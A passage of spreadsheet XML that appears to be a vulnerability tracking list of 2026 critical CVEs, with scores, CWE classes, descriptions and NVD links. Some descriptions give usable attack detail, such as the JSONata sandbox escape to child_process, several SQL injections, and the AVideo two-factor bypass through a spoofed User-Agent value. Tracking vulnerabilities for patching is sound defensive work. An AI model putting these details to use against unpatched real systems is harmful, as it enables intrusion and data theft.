    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77414</t>
        </is>
      </c>
      <c r="C490" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D490" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L490" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, the src/jsonata.js environment.lookup function used a bypassable hasOwnProperty check. Crafted expressions could use $hasOwnProperty, $spread, $string, prototype access, and $constructor to reach the object prototype and invoke process.getBuiltinModule with child_process, executing arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="M490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77414</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77415</t>
        </is>
      </c>
      <c r="C491" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D491" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E491" s="5" t="inlineStr"/>
      <c r="F491" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L491" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, crafted JSONata expressions could chain several object-integrity weaknesses to execute arbitrary code. The chain could overwrite $clone to mutate objects through evaluateTransformExpression, expose and deconstruct JSONata functions or lambdas through $merge.*, replace proc.arguments.forEach used by applyProcedure, and forge internal lambda state. These primitives allowed an attacker to reach prototype getters, prototype and constructor access, and process.getBuiltinModule with child_process, executing code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="M491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77415</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77642</t>
        </is>
      </c>
      <c r="C492" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D492" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E492" s="5" t="inlineStr"/>
      <c r="F492" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr">
        <is>
          <t>torproject:tor</t>
        </is>
      </c>
      <c r="I492" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L492" s="5" t="inlineStr">
        <is>
          <t>tor before 0.4.9.9 was prone to an out-of-bounds write when parsing a consensus or  detached signature with unexpected signature digest type. Impact  is minor for most Tor roles, but potentially major for directory   authorities. This is TROVE-2026-019.</t>
        </is>
      </c>
      <c r="M492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77642</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77644</t>
        </is>
      </c>
      <c r="C493" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D493" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E493" s="5" t="inlineStr"/>
      <c r="F493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-620</t>
        </is>
      </c>
      <c r="L493" s="5" t="inlineStr">
        <is>
          <t>A critical bypass access control vulnerability has been reported in PTC Windchill Risk and Reliability (WRR) Enterprise Edition.</t>
        </is>
      </c>
      <c r="M493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77644</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="C494" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D494" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E494" s="5" t="inlineStr"/>
      <c r="F494" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G494" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L494" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="M494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78012</t>
        </is>
      </c>
      <c r="C495" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D495" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J495" s="5" t="inlineStr"/>
      <c r="K495" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L495" s="5" t="inlineStr">
        <is>
          <t>An issue in the NetStaX EtherNet/IP Stack prior to v5.6.1 could allow a large Class 3 explicit-message request to exceed the application-side receive buffer without generating an error or warning. The result could be memory corruption, a device crash, or a potential remote attack vector without the originating device receiving a CIP error indicating that the request could not be processed.</t>
        </is>
      </c>
      <c r="M495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78012</t>
        </is>
      </c>
    </row>
    <row r="496">
      <c r="A496" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78082</t>
        </is>
      </c>
      <c r="C496" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D496" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E496" s="5" t="inlineStr"/>
      <c r="F496" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G496" s="5" t="inlineStr"/>
      <c r="H496" s="5" t="inlineStr"/>
      <c r="I496" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J496" s="5" t="inlineStr"/>
      <c r="K496" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L496" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated SQL Injection in Property Search and Map Filtering in SP Property &lt; 4.1.4 - The property search and listing query builders assembled several WHERE and ORDER BY clauses (zipcode, sorting, price_range_dropdown, and psize_range_dropdown) by directly concatenating raw request parameters into SQL strings without quoting or type casting. An unauthenticated remote attacker could execute boolean-based or time-based blind SQL injection to extract sensitive data from the database.</t>
        </is>
      </c>
      <c r="M496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78082</t>
        </is>
      </c>
    </row>
    <row r="497">
      <c r="A497" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78997</t>
        </is>
      </c>
      <c r="C497" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D497" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E497" s="5" t="inlineStr"/>
      <c r="F497" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G497" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H497" s="5" t="inlineStr"/>
      <c r="I497" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J497" s="5" t="inlineStr"/>
      <c r="K497" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L497" s="5" t="inlineStr">
        <is>
          <t>UC Browser for Android (package com.UCMobile.intl, version 13.7.8.1314) contains a Universal Cross-Site Scripting vulnerability that allows an attacker to execute arbitrary JavaScript in the context of any origin. An attacker hosts a specially crafted URL on a UC-owned domain (via a reflected XSS) that leverages the browser's internal JavaScript bridge to register a deferred callback, navigate the tab to a victim site, and then execute attacker-controlled code on that site when a login dialog is dismissed.</t>
        </is>
      </c>
      <c r="M497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t>
        </is>
      </c>
    </row>
    <row r="498">
      <c r="A498" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79782</t>
        </is>
      </c>
      <c r="C498" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D498" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E498" s="5" t="inlineStr"/>
      <c r="F498" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G498" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H498" s="5" t="inlineStr"/>
      <c r="I498" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J498" s="5" t="inlineStr"/>
      <c r="K498" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L498" s="5" t="inlineStr">
        <is>
          <t>rclone before 1.74.4 fails to strip the X-Amz-Security-Token header when an S3 redirect changes scheme from HTTPS to HTTP on the same host. Attackers can intercept plaintext HTTP traffic to capture AWS STS session tokens sent in request headers.</t>
        </is>
      </c>
      <c r="M498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79782</t>
        </is>
      </c>
    </row>
    <row r="499">
      <c r="A499" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80238</t>
        </is>
      </c>
      <c r="C499" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D499" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E499" s="5" t="inlineStr"/>
      <c r="F499" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G499" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H499" s="5" t="inlineStr"/>
      <c r="I499" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J499" s="5" t="inlineStr"/>
      <c r="K499" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="L499" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Execution with Unnecessary Privileges vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Protection mechanism bypass. This vulnerability is considered critical because a low-privileged operator with SSH access to the SCG host can gain root-level access to the host without requiring a password by leveraging the exposed Docker socket. Additionally, an attacker who compromises a service running within the orchestrator container can access the same socket and escape the container boundary to obtain host-level control. Dell recommends that customers upgrade at the earliest opportunity.</t>
        </is>
      </c>
      <c r="M499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80238</t>
        </is>
      </c>
    </row>
    <row r="500">
      <c r="A500" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80428</t>
        </is>
      </c>
      <c r="C500" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D500" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E500" s="5" t="inlineStr"/>
      <c r="F500" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G500" s="5" t="inlineStr"/>
      <c r="H500" s="5" t="inlineStr"/>
      <c r="I500" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J500" s="5" t="inlineStr"/>
      <c r="K500" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L500" s="5" t="inlineStr">
        <is>
          <t>ILIAS before versions 9.22, 10.10, and 11.3 contains an unauthenticated PHP object injection vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting serialized objects through the LTI authentication endpoint and triggering deserialization via the Shibboleth back-channel logout endpoint. Attackers can write arbitrary serialized objects into session storage, then exploit an available POP gadget through the logout endpoint's unrestricted deserialization to write attacker-controlled PHP content to a web-accessible path and achieve remote code execution as the web server user.</t>
        </is>
      </c>
      <c r="M500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80428</t>
        </is>
      </c>
    </row>
    <row r="501">
      <c r="A501" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81800</t>
        </is>
      </c>
      <c r="C501" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D501" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E501" s="5" t="inlineStr"/>
      <c r="F501" s="5" t="inlineStr"/>
      <c r="G501" s="5" t="inlineStr"/>
      <c r="H501" s="5" t="inlineStr"/>
      <c r="I501" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J501" s="5" t="inlineStr"/>
      <c r="K501" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L501" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in Verified Reviews (Avis Vérifiés) &lt;= 2.4.6 versions.</t>
        </is>
      </c>
      <c r="M501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81800</t>
        </is>
      </c>
    </row>
    <row r="502">
      <c r="A502" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82526</t>
        </is>
      </c>
      <c r="C502" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D502" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E502" s="5" t="inlineStr"/>
      <c r="F502" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G502" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H502" s="5" t="inlineStr"/>
      <c r="I502" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J502" s="5" t="inlineStr"/>
      <c r="K502" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L502" s="5" t="inlineStr">
        <is>
          <t>R2R through 3.6.6 contains a stacked SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL statements by manipulating the index name parameter in the vector index creation endpoint. The index name is interpolated directly into a CREATE INDEX statement via string formatting without identifier quoting or allowlist validation, enabling arbitrary DDL and DML execution through semicolon-separated statements under the PostgreSQL superuser account.</t>
        </is>
      </c>
      <c r="M502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t>
        </is>
      </c>
    </row>
    <row r="503">
      <c r="A503" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82854</t>
        </is>
      </c>
      <c r="C503" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D503" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E503" s="5" t="inlineStr"/>
      <c r="F503" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G503" s="5" t="inlineStr"/>
      <c r="H503" s="5" t="inlineStr"/>
      <c r="I503" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J503" s="5" t="inlineStr"/>
      <c r="K503" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L503" s="5" t="inlineStr">
        <is>
          <t>Nodemailer before 8.0.4 is vulnerable to SMTP command injection through the unsanitized envelope.size parameter. When an application passes a custom envelope object with a size property containing CRLF characters to sendMail(), the value is concatenated into the SMTP MAIL FROM command (as SIZE=...) without sanitization, allowing injection of arbitrary SMTP commands such as RCPT TO to silently add attacker-controlled recipients. Exploitation requires the application to expose the envelope size to attacker-controlled input, as Nodemailer does not include size in the default auto-constructed envelope.</t>
        </is>
      </c>
      <c r="M503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82854</t>
        </is>
      </c>
    </row>
    <row r="504">
      <c r="A504" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82859</t>
        </is>
      </c>
      <c r="C504" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D504" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E504" s="5" t="inlineStr"/>
      <c r="F504" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G504" s="5" t="inlineStr"/>
      <c r="H504" s="5" t="inlineStr"/>
      <c r="I504" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J504" s="5" t="inlineStr"/>
      <c r="K504" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L504" s="5" t="inlineStr">
        <is>
          <t>hulumi versions before v1.3.2 contain a deployment SCP template that allows tag-on-create bypasses for hulumi:iac-role protections. Attackers can bypass intended IAM boundary restrictions by exploiting the weakened SCP template in downstream deployments.</t>
        </is>
      </c>
      <c r="M504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82859</t>
        </is>
      </c>
    </row>
    <row r="505">
      <c r="A505" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82876</t>
        </is>
      </c>
      <c r="C505" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D505" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E505" s="5" t="inlineStr"/>
      <c r="F505" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G505" s="5" t="inlineStr"/>
      <c r="H505" s="5" t="inlineStr"/>
      <c r="I505" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J505" s="5" t="inlineStr"/>
      <c r="K505" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L505" s="5" t="inlineStr">
        <is>
          <t>Phison PS3111-S11 controller firmware verifies RSA signatures using a public modulus embedded within the firmware image itself rather than anchored in immutable storage. Attackers can generate arbitrary RSA key pairs, sign modified firmware with the private key, embed the matching modulus in the signature segment, and the controller accepts the tampered firmware as valid.</t>
        </is>
      </c>
      <c r="M505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82876</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8323</t>
        </is>
      </c>
      <c r="C506" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D506" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L506" s="5" t="inlineStr">
        <is>
          <t>URL redirection to untrusted site ('open redirect') vulnerability in Armiya Information Technologies Ltd. Co. Access Control System allows Fake the Source of Data.
This issue affects Access Control System: before Versiyon 2.</t>
        </is>
      </c>
      <c r="M506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8323</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84479</t>
        </is>
      </c>
      <c r="C507" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D507" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L507" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo (current e01e41ecc and earlier) makes three login-time security controls depend solely on the client-supplied User-Agent header. The isAVideoEncoder()/isAVideoMobileApp() checks match HTTP_USER_AGENT against a hardcoded literal ("AVideoEncoder"/"AVideoMobileApp") with no IP check or shared secret. An attacker who submits valid credentials and sets User-Agent: AVideoEncoder bypasses two-factor authentication, skips brute-force captcha escalation, and avoids being recorded in the login/device audit history. No patch is available at the time of publication.</t>
        </is>
      </c>
      <c r="M507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84479</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84480</t>
        </is>
      </c>
      <c r="C508" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D508" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L508" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to validate password recovery token expiration in userRecoverPassSave.json.php, allowing attackers to use expired tokens to reset account passwords indefinitely. Attackers who obtain a recovery token can use it at any time to change the target account's password and gain full account access.</t>
        </is>
      </c>
      <c r="M508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84480</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84695</t>
        </is>
      </c>
      <c r="C509" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D509" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L509" s="5" t="inlineStr">
        <is>
          <t>BookStack before 26.05.4 contains a stored cross-site scripting vulnerability in the drawing upload endpoint that accepts unvalidated base64 content and stores it without content inspection. Attackers with editor permissions can upload SVG files containing scripts that execute in administrator browsers when accessed through the image gallery API without content-type validation or CSP headers.</t>
        </is>
      </c>
      <c r="M509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84695</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84696</t>
        </is>
      </c>
      <c r="C510" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D510" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L510" s="5" t="inlineStr">
        <is>
          <t>Phison PS3111-S11 controller firmware versions through SBFQT1.3 expose privileged vendor unique commands over the ATA interface with absent or defeatable authentication mechanisms. Attackers can bypass the weak CRC-16 based unlock handshake or exploit builds with no VUC lock to read and write controller memory and raw flash, persisting implants across power cycles.</t>
        </is>
      </c>
      <c r="M510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84696</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85146</t>
        </is>
      </c>
      <c r="C511" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D511" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr">
        <is>
